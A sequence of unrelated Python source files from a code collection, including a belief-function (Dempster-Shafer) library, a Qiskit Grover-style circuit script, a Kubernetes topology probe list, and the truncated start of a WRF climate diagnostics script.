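    # with quantization: three samples of frozenset({'a'}) and one of frozenset({'b'}), shuffled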
"""
if not isinstance(n, int):
raise TypeError("n must be int")
samples = {h:0 for h in self} if as_dict else []
mass_sum = fsum(self.values())
if quantization:
remainders = []
remaining_sample_count = n
for (h, v) in self.items():
fraction = n * v / mass_sum
quotient = int(fraction)
if quotient > 0:
if as_dict:
samples[h] = quotient
else:
samples.extend([h] * quotient)
remainders.append((h, fraction - quotient))
remaining_sample_count -= quotient
remainders.sort(reverse=True, key=lambda hv: hv[1])
for h, _ in remainders[:remaining_sample_count]:
if as_dict:
samples[h] += 1
else:
samples.append(h)
else:
rv = [uniform(0.0, mass_sum) for _ in range(n)]
hypotheses = sorted(self.items(), reverse=True, key=lambda hv: hv[1])
for i in range(n):
mass = 0.0
for (h, v) in hypotheses:
mass += v
if mass >= rv[i]:
if as_dict:
samples[h] += 1
else:
samples.append(h)
break
if not as_dict:
shuffle(samples)
return samples
def contour_consistency(self):
""""
Contour consistency
"""
return self.pl(self.max_pl())
def contour_conflict(self):
return 1 - self.contour_consistency()
def shapley(self, masses, normalization, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_conjunctive(coalition, normalization)
m1 = self.combine_conjunctive(coalition, normalization)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_yager(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_yager(coalition)
m1 = self.combine_yager(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_conj_disj(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_conjunctive_disjunctive(coalition)
m1 = self.combine_conjunctive_disjunctive(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_disj(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
if len(coalition)>1:
m0 = coalition[0].combine_conjunctive_disjunctive(coalition[1:])
else:
m0 = coalition[0]
m1 = self.combine_disjunctive(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def is_probabilistic(self):
"""
Checks whether the mass function is a probability function.
Returns True if and only if all hypotheses are singletons (normalization is ignored).
"""
return all([len(h) == 1 for h in self.keys()])
def sample_probability_distributions(self, n):
"""
Randomly generates n compatible probability distributions from the mass function.
The result is a list of n independently sampled probability distributions expressed as mass functions.
This can be useful for estimating various statistical measures like the minimum or maximum entropy consistent with the mass distribution.
"""
samples = [MassFunction() for _ in range(n)]
for i in range(n):
for (h, v) in self.items():
if len(h) == 1:
samples[i][h] += v
else:
rv = [random() for _ in range(len(h))]
total = fsum(rv)
for k, s in enumerate(h):
samples[i][{s}] += rv[k] * v / total
return samples
def max_bel(self):
"""
Returns the singleton with the highest belief.
In case there are multiple singletons with maximum belief, only one of them is returned.
Returns None, if the mass function does not contain any hypotheses.
"""
return self._max_singleton(self.bel)
def max_pl(self):
"""
Returns the singleton with the highest plausibility.
In case there are multiple singletons with maximum plausibility, only one of them is returned.
Returns None, if the mass function does not contain any hypotheses.
"""
return self._max_singleton(self.pl)
def _max_singleton(self, f):
st = self.singletons()
if st:
value_list = [(f(s), s) for s in st]
shuffle(value_list)
return max(value_list)[1]
else:
return None
def to_dict(self):
"""Convert a mass function only consisting of singletons to a dictionary by removing each enclosing frozenset."""
if not self.is_probabilistic():
raise Exception('mass function must only contain singletons')
return {tuple(h)[0]:v for h, v in self.items()}
@staticmethod
def from_dict(d):
"""Convert a dictionary to a mass function by enclosing each key with a frozenset."""
if isinstance(d, MassFunction):
return d
else:
return MassFunction({frozenset((h,)):v for h, v in d.items()})
@staticmethod
def from_possibility(poss):
"""
Constructs a consonant mass function from a possibility distribution.
For more information, see:
D. Dubois, H. Prade (1982), "On several representations of an uncertain body of evidence",
Fuzzy Information and Decision Processes, 167-181.
"""
if isinstance(poss, MassFunction):
poss = poss.to_dict() # remove enclosing sets
H, P = zip(*sorted(poss.items(), key=lambda e: e[1], reverse=True)) # sort possibility values in descending order
m = MassFunction()
m[H] = P[-1]
for i in range(len(H) - 1):
m[H[:i + 1]] = P[i] - P[i + 1]
return m
@staticmethod
def pignistic_inverse(p):
"""
Constructs a consonant mass function from a pignistic probability distribution by applying the inverse pignistic transformation.
For more information, see:
D. Dubois, H. Prade, P. Smets (2008), "A definition of subjective possibility",
International Journal of Approximate Reasoning 48 (2), 352-364.
"""
p = MassFunction.from_dict(p)
poss = MassFunction({h1:fsum([min(p[h1], p[h2]) for h2 in p.keys()]) for h1 in p.keys()})
return MassFunction.from_possibility(poss)
@staticmethod
def _to_array_index(hypothesis, frame):
"""Map a hypothesis to an array index given a frame of discernment."""
index = 0
for i, s in enumerate(frame):
if s in hypothesis:
index += 2**i
return index
@staticmethod
def _from_array_index(index, frame):
"""Map an array index to a hypothesis given a frame of discernment."""
hypothesis = set()
for i, s in enumerate(frame):
if 2**i & index:
hypothesis.add(s)
return frozenset(hypothesis)
def to_array(self, frame):
"""
Convert the mass function to a NumPy array.
Hypotheses are mapped to array indices using '_to_array_index'.
The resulting array has 2^n entries where n is the size of the frame of discernment.
"""
a = numpy.zeros(2**len(frame))
for h, v in self.items():
a[MassFunction._to_array_index(h, frame)] = v
return a
@staticmethod
def from_array(a, frame):
"""
Convert a NumPy array to a mass function given a frame of discernment.
Array indices are mapped to hypotheses using '_from_array_index'.
"""
m = MassFunction()
for i, v in enumerate(a):
if v > 0.0:
m[MassFunction._from_array_index(i, frame)] = v
return m
@staticmethod
def _confidence_intervals(histogram, alpha):
"""Compute Goodman confidence intervals."""
p_lower = {}
p_upper = {}
a = chi2.ppf(1. - alpha / len(histogram), 1)
n = float(sum(histogram.values()))
for h, n_h in histogram.items():
delta_h = a * (a + 4. * n_h * (n - n_h) / n)
p_lower[h] = (a + 2. * n_h - sqrt(delta_h)) / (2. * (n + a))
p_upper[h] = (a + 2. * n_h + sqrt(delta_h)) / (2. * (n + a))
return p_lower, p_upper
@staticmethod
def from_samples(histogram, method='idm', alpha=0.05, s=1.0):
"""
Generate a mass function from an empirical probability distribution that was obtained from a limited number of samples.
This makes the expected deviation of the empirical distribution from the true distribution explicit.
'histogram' represents the empirical distribution. It is a dictionary mapping each possible event to the respective
number of observations (represented as integers).
'method' determines the algorithm used for generating the mass function.
Except for method 'bayesian', all algorithms are based on the idea that the true probabilities lie within confidence intervals
represented by the mass function with confidence level 1 - 'alpha'.
The following modes are supported:
'idm': Imprecise Dirichlet model. A small amount of mass (controlled by 's') is assigned to the entire frame.
For more information on 'idm', see:
P. Walley (1996), "Inferences from multinomial data: learning about a bag of marbles",
Journal of the Royal Statistical Society. Series B (Methodological), 3-57.
'maxbel': Maximize the total belief by solving a linear program. (Attention: this becomes very computationally expensive
for larger numbers of events.)
'maxbel-ordered': Similar to 'maxbel' except that the events are assumed to have a natural order (e.g., intervals), in which case
the mass function can be computed analytically and thus much faster.
For more information on 'maxbel' and 'maxbel-ordered', see:
T. Denoeux (2006), "Constructing belief functions from sample data using multinomial confidence regions",
International Journal of Approximate Reasoning 42, 228-252.
'mcd': Compute the least committed consonant mass function whose pignistic transformation lies within the confidence interval
induced by 'alpha'. Like 'maxbel', it is based on solving a linear program and quickly becomes computationally expensive.
'mcd-approximate': An approximation of 'mcd' that can be computed much more efficiently.
For more information on these two methods, see:
A. Aregui, T. Denoeux (2008), "Constructing consonant belief functions from sample data using confidence sets of pignistic probabilities",
International Journal of Approximate Reasoning 49, 575-594.
'bayesian': Construct a Bayesian mass function based on the relative frequencies. In addition, additive smoothing is applied (controlled by 's').
In case the sample number is 0, returns a vacuous mass function (or uniform distribution for 'bayesian').
(Requires SciPy for computing confidence intervals and solving linear programs.)
"""
if not isinstance(histogram, dict):
raise TypeError('histogram must be of type dict')
for v in histogram.values():
if not isinstance(v, int):
raise TypeError('all histogram values must be of type int')
if not histogram:
return MassFunction()
if sum(histogram.values()) == 0: # return vacuous/uniform belief if there are no samples
vac = MassFunction({tuple(histogram.keys()):1})
if method == 'bayesian':
return vac.pignistic()
else:
return vac
if method == 'bayesian':
return MassFunction({(h,):v + s for h, v in histogram.items()}).normalize()
elif method == 'idm':
return MassFunction._from_samples_idm(histogram, s)
elif method == 'maxbel':
return MassFunction._from_samples_maxbel(histogram, alpha)
elif method == 'maxbel-ordered':
return MassFunction._from_samples_maxbel(histogram, alpha, ordered=True)
elif method == 'mcd':
return MassFunction._from_samples_mcd(histogram, alpha)
elif method == 'mcd-approximate':
return MassFunction._from_samples_mcd(histogram, alpha, approximate=True)
raise ValueError('unknown method: %s' % method)
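# Usage sketch (illustrative; the histogram values are made up):
#   hist = {'a': 5, 'b': 3, 'c': 2}
#   m_idm = MassFunction.from_samples(hist, method='idm', s=1.0)
#   m_bayes = MassFunction.from_samples(hist, method='bayesian', s=1.0)
# 'idm' reserves mass s / (n + s) for the whole frame, while 'bayesian' returns a
# smoothed probability distribution over the singletons.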
@staticmethod
def _from_samples_idm(histogram, s):
"""
Reference:
P. Walley (1996), "Inferences from multinomial data: learning about a bag of marbles",
Journal of the Royal Statistical Society. Series B (Methodological), 3-57.
"""
total = sum(histogram.values())
m = MassFunction()
for h, c in histogram.items():
m[(h,)] = float(c) / (total + s)
m[MassFunction._convert(histogram.keys())] = float(s) / (total + s)
return m
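# Worked example (illustrative): for histogram {'a': 8, 'b': 2} and s = 1 the result is
# m({'a'}) = 8/11, m({'b'}) = 2/11 and m({'a', 'b'}) = 1/11.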
@staticmethod
def _from_samples_maxbel(histogram, alpha, ordered=False):
"""
Reference:
T. Denoeux (2006), "Constructing belief functions from sample data using multinomial confidence regions",
International Journal of Approximate Reasoning 42, 228-252.
"""
p_lower, p_upper = MassFunction._confidence_intervals(histogram, alpha)
def p_lower_set(hs):
l = u = 0
for h in H:
if h in hs:
l += p_lower[h]
else:
u += p_upper[h]
return max(l, 1 - u)
if ordered:
H = sorted(histogram.keys())
m = MassFunction()
for i1, h1 in enumerate(H):
m[(h1,)] = p_lower[h1]
for i2, h2 in enumerate(H[i1 + 1:]):
i2 += i1 + 1
if i2 == i1 + 1:
v = p_lower_set(H[i1:i2 + 1]) - p_lower[h1] - p_lower[h2]
else:
v = p_lower_set(H[i1:i2 + 1]) - p_lower_set(H[i1 + 1:i2 + 1]) - p_lower_set(H[i1:i2]) + p_lower_set(H[i1 + 1:i2])
if v > 0:
m[H[i1:i2 + 1]] = v
return m
else:
H = list(histogram.keys())
L = 2**len(H)
initial = numpy.zeros(L)
cons = []
singletons = lambda index: [i for i in range(len(H)) if 2**i & index]
# constraint (24)
bel = lambda index, m: fsum(m[sum([2**i for i in h_ind])] for h_ind in powerset(singletons(index)))
c24 = lambda m, i: p_lower_set(MassFunction._from_array_index(i, H)) - bel(i, m)
for i in range(L):
cons.append(partial(c24, i=i))
# constraint (25)
cons.append(lambda m: m.sum() - 1.0)
cons.append(lambda m: 1.0 - m.sum())
# constraint (26)
for i in range(L):
cons.append(partial(lambda m, i_s: m[i_s], i_s=i))
f = lambda m: -1 * 2**len(H) * fsum([m[i] * 2**(-len(singletons(i))) for i in range(L)])
m_optimal = fmin_cobyla(f, initial, cons, disp=0)
return MassFunction.from_array(m_optimal, H)
@staticmethod
def _from_samples_mcd(histogram, alpha, approximate=False):
"""
Reference:
A. Aregui, T. Denoeux (2008), "Constructing consonant belief functions from sample data using confidence
sets of pignistic probabilities", International Journal of Approximate Reasoning 49, 575-594.
"""
p_lower, p_upper = MassFunction._confidence_intervals(histogram, alpha)
H = list(histogram.keys())
if approximate:
# approximate possibility distribution
poss = {h1:min(1, fsum([min(p_upper[h1], p_upper[h2]) for h2 in H])) for h1 in H}
else:
# optimal possibility distribution (based on linear programming)
poss = {h:0. for h in H}
for k, h_k in enumerate(H):
S_k = {l for l in range(len(H)) if p_lower[H[l]] >= p_upper[h_k]}
S_k.add(k)
I_k = {l for l in range(len(H)) if p_upper[H[l]] < p_lower[h_k]}
P_k = set(range(len(H))).difference(S_k.union(I_k))
for A in powerset(P_k):
G = S_k.union(A)
G_c = set(range(len(H))).difference(G)
cons = []
# constraint (26)
for i, h in enumerate(H):
cons.append(partial(lambda p, i_s, p_s: p[i_s] - p_s, i_s=i, p_s=p_lower[h])) # lower bound
cons.append(partial(lambda p, i_s, p_s: p_s - p[i_s], i_s=i, p_s=p_upper[h])) # upper bound
# constraint (27)
cons.append(lambda p: 1. - sum(p))
cons.append(lambda p: sum(p) - 1.)
# constraint (30)
for i in G:
cons.append(partial(lambda p, i_s: p[i_s] - p[k], i_s=i))
# constraint (31)
for i in G_c:
cons.append(partial(lambda p, i_s: p[k] - p[i_s], i_s=i))
initial = [1.0 / len(H)] * len(H)
f = lambda p: -(fsum([p[i] for i in G_c]) + len(G) * p[k])
poss_optimal = fmin_cobyla(f, initial, cons, disp=0)
poss[h_k] = max(poss[h_k], -f(poss_optimal))
return MassFunction.from_possibility(poss)
def powerset(iterable):
"""
Returns an iterator over the power set of 'iterable'.
'iterable' is an arbitrary iterable over hashable elements.
All returned subsets are of type 'frozenset'.
"""
return map(frozenset, chain.from_iterable(combinations(iterable, r) for r in range(len(iterable) + 1)))
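# Example (illustrative): powerset(['a', 'b']) yields frozenset(), frozenset({'a'}),
# frozenset({'b'}) and frozenset({'a', 'b'}).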
def gbt_m(hypothesis, likelihoods, normalization=True):
"""
Computes the mass value of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization)[hypothesis].
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
q = gbt_q(hypothesis, likelihoods, normalization)
return q * reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] not in hypothesis], 1.0)
def gbt_bel(hypothesis, likelihoods, normalization=True):
"""
Computes the belief of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).bel(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
exc = reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] not in hypothesis], 1.0)
all_hyp = reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0)
return eta * (exc - all_hyp)
def gbt_pl(hypothesis, likelihoods, normalization=True):
"""
Computes the plausibility of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).pl(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
return eta * (1.0 - reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] in hypothesis], 1.0))
def gbt_q(hypothesis, likelihoods, normalization=True):
"""
Computes the commonality of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).q(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
return eta * reduce(mul, [l[1] for l in likelihoods if l[0] in hypothesis], 1.0)
def gbt_pignistic(singleton, likelihoods):
"""
Computes the pignistic probability of 'singleton' for the belief function obtained
by applying the generalized Bayesian theorem to 'likelihoods'.
This function has time complexity O(len(likelihoods)**2) and is equivalent to the following
expression (which has exponential complexity):
MassFunction.gbt(likelihoods).pignistic()[(singleton,)]
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
singleton_lh = None
lh_values = []
for h, v in likelihoods:
if h == singleton:
singleton_lh = v
else:
lh_values.append(v)
if singleton_lh is None:
raise ValueError('singleton %s is not contained in likelihoods' % repr(singleton))
m_sum = _gbt_pignistic_recursive(lh_values, 0)
eta = _gbt_normalization(likelihoods)
return sum([eta * v * singleton_lh / (c + 1.) for c, v in enumerate(m_sum)])
def _gbt_pignistic_recursive(likelihoods, i):
"""
Helper function for recursively computing the pignistic probability corresponding to the GBT.
This function computes the sum over all mass values (obtained via the GBT) and groups them by the
cardinalities of the corresponding sets.
"""
if i == len(likelihoods) - 1:
m_sum = [0.] * (len(likelihoods) + 1)
m_sum[0] = 1. - likelihoods[i]
m_sum[1] = likelihoods[i]
return m_sum
else:
m_sum = _gbt_pignistic_recursive(likelihoods, i + 1)
m_sum_inc = [0.] * (len(likelihoods) + 1)
m_sum_exc = [0.] * (len(likelihoods) + 1)
for k in range(len(likelihoods) + 1):
if k < len(likelihoods):
m_sum_inc[k+1] = m_sum[k] * likelihoods[i]
m_sum_exc[k] = m_sum[k] * (1. - likelihoods[i])
m_sum[k] = m_sum_inc[k] + m_sum_exc[k]
return m_sum
def _gbt_normalization(likelihoods):
"""Helper function for computing the GBT normalization constant."""
return 1.0 / (1.0 - reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0))
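# Usage sketch for the module-level GBT helpers (illustrative; the likelihood values are
# made up): with likelihoods = [('a', 0.3), ('b', 0.8)],
#   gbt_pl({'a'}, likelihoods)        # plausibility of {'a'}
#   gbt_bel({'a', 'b'}, likelihoods)  # belief of {'a', 'b'}
#   gbt_pignistic('a', likelihoods)   # pignistic probability of the singleton 'a'
# all agree with the corresponding results of MassFunction.gbt(likelihoods) but avoid
# constructing the full mass function.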
|
py | b414e54450335803d96f77427edc3235fee49150 | import sys
from monitoring.uss_qualifier.webapp import webapp
from . import config
def main(argv):
del argv
webapp.run(host='localhost', port=webapp.config.get(config.KEY_RID_QUALIFIER_HOST_PORT))
if __name__ == '__main__':
main(sys.argv)
|
py | b414e61b704bffdef0408a2c44ba7f9b1206c417 | from .ctdet import CtdetTrainer
train_factory = {'ctdet': CtdetTrainer,}
|
py | b414e651c270a3f673014d09971b226807f434e6 | # qubit number=5
# total number=59
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = pi (180 degrees) ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
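# Note (added comment, hedged): for the constant key used in __main__ below, f(x) == "1"
# only for the all-zero bitstring, so this oracle flips the phase of |00...0> and leaves
# every other basis state unchanged -- a standard Grover-style phase oracle Z_f.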
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.rx(-1.3603096190043806,input_qubit[2]) # number=28
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[3]) # number=34
prog.cz(input_qubit[4],input_qubit[3]) # number=35
prog.h(input_qubit[3]) # number=36
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.x(input_qubit[0]) # number=32
prog.cx(input_qubit[1],input_qubit[0]) # number=33
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[1]) # number=25
prog.x(input_qubit[1]) # number=41
prog.h(input_qubit[1]) # number=50
prog.cz(input_qubit[0],input_qubit[1]) # number=51
prog.h(input_qubit[1]) # number=52
prog.x(input_qubit[2]) # number=11
prog.cx(input_qubit[2],input_qubit[3]) # number=30
prog.x(input_qubit[3]) # number=12
prog.h(input_qubit[2]) # number=42
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[4]) # number=46
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=53
prog.cz(input_qubit[0],input_qubit[2]) # number=54
prog.h(input_qubit[2]) # number=55
prog.cx(input_qubit[0],input_qubit[2]) # number=56
prog.x(input_qubit[2]) # number=57
prog.cx(input_qubit[0],input_qubit[2]) # number=58
prog.h(input_qubit[2]) # number=47
prog.cz(input_qubit[0],input_qubit[2]) # number=48
prog.h(input_qubit[2]) # number=49
prog.rx(-1.9697785938008003,input_qubit[1]) # number=37
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit1715.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
py | b414e74ae421f14965c6e966091b96bde22167db | # Copyright 2020 OpenRCA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orca.topology import bundle
from orca.topology.infra.istio import linker as istio_linker
from orca.topology.infra.k8s import cluster, linker, probe
def get_probes():
return [
bundle.ProbeBundle(
probe=probe.PodPullProbe,
linkers=[
linker.PodToServiceLinker,
linker.PodToReplicaSetLinker,
linker.PodToStatefulSetLinker,
linker.PodToDaemonSetLinker,
linker.PodToNodeLinker,
linker.ConfigMapToPodLinker,
linker.SecretToPodLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.PodPushProbe,
linkers=[
linker.PodToServiceLinker,
linker.PodToReplicaSetLinker,
linker.PodToStatefulSetLinker,
linker.PodToDaemonSetLinker,
linker.PodToNodeLinker,
linker.ConfigMapToPodLinker,
linker.SecretToPodLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.ServicePullProbe,
linkers=[
linker.PodToServiceLinker,
linker.EndpointsToServiceLinker,
istio_linker.VirtualServiceToServiceLinker,
istio_linker.DestinationRuleToServiceLinker,
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.ServicePushProbe,
linkers=[
linker.PodToServiceLinker,
linker.EndpointsToServiceLinker,
istio_linker.VirtualServiceToServiceLinker,
istio_linker.DestinationRuleToServiceLinker,
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.EndpointsPullProbe,
linkers=[
linker.EndpointsToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.EndpointsPushProbe,
linkers=[
linker.EndpointsToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.DeploymentPullProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToDeploymentLinker
]
),
bundle.ProbeBundle(
probe=probe.DeploymentPushProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToDeploymentLinker
]
),
bundle.ProbeBundle(
probe=probe.ReplicaSetPullProbe,
linkers=[
linker.PodToReplicaSetLinker,
linker.ReplicaSetToDeploymentLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.ReplicaSetPushProbe,
linkers=[
linker.PodToReplicaSetLinker,
linker.ReplicaSetToDeploymentLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.DaemonSetPullProbe,
linkers=[
linker.PodToDaemonSetLinker
]
),
bundle.ProbeBundle(
probe=probe.DaemonSetPushProbe,
linkers=[
linker.PodToDaemonSetLinker
]
),
bundle.ProbeBundle(
probe=probe.StatefulSetPullProbe,
linkers=[
linker.PodToStatefulSetLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.StatefulSetPushProbe,
linkers=[
linker.PodToStatefulSetLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.ConfigMapPullProbe,
linkers=[
linker.ConfigMapToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.ConfigMapPushProbe,
linkers=[
linker.ConfigMapToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.SecretPullProbe,
linkers=[
linker.SecretToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.SecretPushProbe,
linkers=[
linker.SecretToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.StorageClassPullProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker
]
),
bundle.ProbeBundle(
probe=probe.StorageClassPushProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumePullProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker,
linker.PersistentVolumeToPersistentVolumeClaimLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumePushProbe,
linkers=[
linker.PersistentVolumeToStorageClassLinker,
linker.PersistentVolumeToPersistentVolumeClaimLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumeClaimPullProbe,
linkers=[
linker.PersistentVolumeToPersistentVolumeClaimLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.PersistentVolumeClaimPushProbe,
linkers=[
linker.PersistentVolumeToPersistentVolumeClaimLinker,
linker.PersistentVolumeClaimToPodLinker
]
),
bundle.ProbeBundle(
probe=probe.HorizontalPodAutoscalerPullProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.HorizontalPodAutoscalerPushProbe,
linkers=[
linker.DeploymentToHorizontalPodAutoscalerLinker,
linker.ReplicaSetToHorizontalPodAutoscalerLinker,
linker.StatefulSetToHorizontalPodAutoscalerLinker
]
),
bundle.ProbeBundle(
probe=probe.NodePullProbe,
linkers=[
linker.PodToNodeLinker,
linker.NodeToClusterLinker
]
),
bundle.ProbeBundle(
probe=probe.NodePushProbe,
linkers=[
linker.PodToNodeLinker,
linker.NodeToClusterLinker
]
),
bundle.ProbeBundle(
probe=probe.IngressPullProbe,
linkers=[
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=probe.IngressPushProbe,
linkers=[
linker.IngressToServiceLinker
]
),
bundle.ProbeBundle(
probe=cluster.ClusterProbe,
linkers=[
linker.NodeToClusterLinker
]
)
]
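# Usage sketch (illustrative; the runner loop is an assumption, not part of this module):
#   for b in get_probes():
#       # start b.probe and register b.linkers with the topology graph
#       ...
# Each ProbeBundle pairs one Kubernetes/Istio probe with the linkers that connect the
# entities it discovers to the rest of the topology.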
|
py | b414e7e0bbfe363bbfa09a5ebd9184a4f2ae310f | #!/bin/python
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import Ngl,Nio
from diag_functions import *
def get_PI_year(case, year):
data_dir="~/PROJ_WRF/%s/%s/"
post_file="wrfpost_%s_%s_%s.nc"
tstorms_file="wrf_tstorms_%s_%s.nc"
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,"01"))
temp_tfile=Nio.open_file(data_dir %(case,year) + tstorms_file %(case,year))
T_200=np.mean(temp_tfile.variables["T200"].get_value(),axis=0)[:,:]
T_sfc=np.mean(temp_pfile.variables["T_sfc_monthly"].get_value(),axis=0)[:,:]
LH=np.mean(temp_pfile.variables["LH_monthly"].get_value(),axis=0)[:,:]
